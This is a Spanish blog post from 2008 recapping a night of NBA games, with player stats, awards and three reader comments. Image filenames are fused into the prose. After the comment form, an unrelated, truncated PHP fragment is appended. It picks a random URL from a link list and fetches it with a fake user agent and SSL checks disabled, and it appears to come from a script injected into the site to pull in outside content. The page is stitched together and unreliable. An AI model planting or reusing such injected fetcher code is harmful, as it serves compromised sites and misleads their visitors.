La crónica (9/03/08)

10 de March de 2008 por MagicJohnson32

El enfrentamiento entre Suns-Spurs, convertido en algo así como un derbi desde sus pasadas y polémicas semifinales de conferencia, centraba buena parte de la atención del domingo. El partido no defraudó pero no fue lo único que merece ser comentado en nuestra crónica.

La crónica:

rashonesterovicvselsonEl Raptors-Sonics abrió la actividad del domingo. Y, por un momento, incluso pareció que los de Seattle querían ganar. No duró mucho, y Toronto, pese a seguir sin Chris Bosh, fue encontrando facilidades en ataque, especialmente cerca de aro. Las facilidades fueron tantas que Nesterovic se lució: 17 puntos, 7 de 10 en tiros, 6 rebotes y 6 asistencias en 28 minutos. Anthony Parker volvió a ser la referencia exterior raptor con 23 puntos, mientras Calderón sigue bajando sus prestaciones (7 puntos, 5 asistencias). Wilcox, Durant, Watson y Collison fueron los más destacados de los Sonics, que con este 106-114 amplía a 4 su racha de derrotas.

A la misma hora, Thaddeus Young daba nuevas muestras de su talento para conducir a los Sixers a otra victoria, y ya van cuatro seguidas. Philadelphia está cada vez más asentado en posiciones de Playoffs y acumula 4 partidosshaqcrowdsunspurs sobre el 9º del Este, los Nets. El triunfo de anoche por 119-97 fue a costa de unos Bucks que no saben a lo que juegan y a los que les pesa demasiado la ausencia de Mo Williams. Young anotó 22 puntos y otros 6 sixers superaron la decena de puntos, mientras que Villanueva con 25-8 fue el más destacado por Milwaukee. Bogut, con 1 punto y 2 rebotes en 27 minutos, fue la viva imagen de lo que son los Bucks esta temporada.

Los Suns encontraron razones para pensar que puede que la nueva pieza en su puzzle acabe encajando: tal vez la adquisición de O’Neal tenga sentido. Shaq, más entregado de lo que vieron en Miami el último año y medio (tanto que no duda en lanzarse entre el público a salvar un balón), completó una notable actuación en el triunfo 87-94 ante los Spurs, una victoria fundamental para los Suns para seguir aspirando a una de las primeras cuatro plazas y, ante todo, desde el punto de vista moral. Nash, Hill y Stoudemire hicieron el resto para superar con dificultades a unos Spurs liderados por Parker y Ginóbili, con un Duncan bastante discreto. La jornada fue perfecta para Phoenix y no tan mala para San Antonio, ya que los Lakers encajaron una tayshprinceblockbullssorprendente derrota en su pista ante Sacramento por 114-113. De nuevo apareció la debilidad defensiva angelina, que permitió anotar 71 puntos en la primera mitad a los Kings. Aun así, el gran encuentro de Pau Gasol y la efectividad de Odom, Radmanovic y Vujacic mantuvieron a los Lakers con opciones hasta el final. Kobe Bryant no estuvo acertado esta vez en el tramo decisivo y, después de dos tiros libres de Udrih a 4 segundos para el final, el #24 erró el tiro que pudo haber dado la victoria a su equipo. Pese a perder, los Lakers se mantienen en cabeza de la Conferencia Oeste.

En el duelo más interesante que ofrecía el Este anoche, los Pistons impusieron la lógica frente a los Bulls, a los que vencieron 109-116 con una sensacional exhibición anotadora de Billups (34 puntos en 35 minutos, con 9 de 12 en tiros de campo, 13 de 14 en libres) y de coraje por parte de Prince, que logró 22-6-6 pese a recibir una falta que hizo temerse lo peor a los aficionados del Palace de Auburn Hills. Hamilton añadió 23 puntos y 7 asistencias para los Pistons, que repitieron con Ratliff de inicio en ausencia de Sheed Wallace. Gordon imitó a Billups con 10 de 12 en tiros y 27 puntos, y Deng añadió 21, pero no evitaron una derrota que deja a los Bulls a 1.5 partidos de la octava posición.paucolgadofisher

Nuestro MVP: Gran partido de Pau Gasol en la derrota de los Lakers frente Sacramento. 25 puntos, 7 rebotes y 9 asistencias, muy cerquita del triple doble. También tenemos que destacar los 34 puntos (con 9 de 12 en tiros) de Chauncey Billups y los 25 puntos y 8 rebotes de Charlie Villanueva, que parece haber encontrado su sitio por fin en los Bucks

Rookie: Impresionante el acierto en el tiro en los últimos partidos de Thaddeus Young. Ayer, 8 de 11 para un total de 22 puntos. Y por su lado, Spencer Hawes, pívot de Sacramento está disfrutando de más de 20 minutos en los últimos partidos y él está mostrando una buena progresión. 14 puntos, 8 rebotes, 3 asistencias y 4 tapones en 21 minutos de juego.

Sorpresa: Noche de pívots sorpresa. Partidazo de Chris Wilcox con 28 puntos y 10 rebotes, buen partido de Radoslav Nesterovic, de los Raptors, 17 puntos, 6 rebotes y 6 asistencias y buen partido también de Mikki “Spaghetti” Moore que acabó con 14 puntos y 9 rebotes.

Decepción: Horribles partidos de 2 veteranos como Antonio McDyess y Michael Finley. El primero anotó sólo una canasta de 10 intentos, la nota discordante en el buen partido de los Pistons; y el segundo contribuyó definitivamente a la derrota de los Spurs con un 0 de 6 en lanzamientos de campo. Aunque más decepcionante si cabe fue el partido de Andrew Bogut, que se quedó en 1 punto y 2 rebotes, además de verse claramente superado por Dalembert.

Acabamos con las 10 mejores jugadas de la pasada noche:

 

Comenta

3 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Madre mia a quien le haya caido O neal creo k necesitara asistencia (es la jugada 5 del video).

      Citar

  2. Elio dice:
    #2

    A mi Shaquille me gustó bastante, el detalle de volar entre el público deja ver sus ganas.

    Lo de la derrota de Lakers debe ser un toque de atención, no se puede permitir que te metan 71 puntos en dos cuartos pero L.A. ayer no tenia ganas de defender…

    Por cierto, el año pasado Spurs y Suns se enfrentaron en semifinales de Conferencia, no en las finales (fueron Spurs-Jazz).

    Saludos!

      Citar

  3. Gallis dice:
    #3

    Coincido en el toque de atención a Lakers. Quizá están(estamos, jeje) con los pies un poquito por encima del suelo, pero bueno, nada que no se pueda corregir…después de 3 años de travesia por el desierto, dejales que disfruten 1 mes, jojojojo…

    Y lo de Shaq está bien, pero los Suns necesitan que ponga las mismas ganas contra los Hawks o contra los Wolves.

    Ahora cambio lo de la final de conferencia…

    Saludos!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>